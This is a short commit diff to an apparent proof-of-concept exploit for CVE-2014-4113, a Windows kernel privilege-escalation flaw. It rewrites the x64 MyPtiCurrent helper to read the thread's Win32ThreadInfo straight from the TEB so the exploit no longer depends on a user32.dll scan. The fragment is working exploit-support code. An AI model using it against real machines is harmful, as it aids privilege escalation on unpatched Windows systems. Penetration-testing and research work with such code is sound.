Make GetPtiCurrent USER32 independent

external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c

@@ -108,47 +108,10 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
 
 #ifdef _M_X64
 QWORD MyPtiCurrent(void) {
-	struct _IMAGE_DOS_HEADER *hUser32;
-	PIMAGE_DOS_HEADER dosHeader;
-	FARPROC tmpProcAddress;
-	PIMAGE_NT_HEADERS ntHeader;
-	QWORD imageBase;
-	BYTE currentByte;
-	QWORD sizeOfImage;
-	int counter;
-	PIMAGE_DOS_HEADER(*v8)(void);
-	PIMAGE_DOS_HEADER *v10;
+	void *teb = (void *)__readgsqword(0x30);
+	QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
 
-	v10 = 0;
-	hUser32 = LoadLibraryA("user32.dll");
-	dosHeader = hUser32;
-	if (hUser32) {
-		tmpProcAddress = GetProcAddress(hUser32, "AnimateWindow");
-		if (tmpProcAddress && dosHeader->e_magic == 'ZM') {
-			ntHeader = (PIMAGE_NT_HEADERS)((BYTE *)dosHeader + dosHeader->e_lfanew);
-			imageBase = ntHeader->OptionalHeader.ImageBase;
-			currentByte = *(BYTE *)tmpProcAddress;
-			sizeOfImage = imageBase + ntHeader->OptionalHeader.SizeOfImage;
-			counter = 0;
-			do {
-				if (currentByte == 0xe8) {
-					v8 = (FARPROC)((char *)tmpProcAddress);
-					v8 = (FARPROC)((QWORD)v8 + counter);
-					v8 = (FARPROC)((DWORD)v8 + *(DWORD *)((char *)tmpProcAddress + counter + 1));
-					v8 = (FARPROC)((QWORD)v8 + 5);
-					if (((QWORD)v8 >= imageBase) && ((QWORD)v8 <= sizeOfImage)) {
-						v10 = (PIMAGE_DOS_HEADER *)v8();
-						break;
-					}
-				}
-				counter++;
-				currentByte = *((BYTE *)tmpProcAddress + counter);
-			} while (counter <= 70);
-		}
-		FreeLibrary(dosHeader);
-		dosHeader = (PIMAGE_DOS_HEADER)v10;
-	}
-	return (QWORD)dosHeader;
+	return Win32ThreadInfo;
 }
 #else
 DWORD __stdcall MyPtiCurrent() {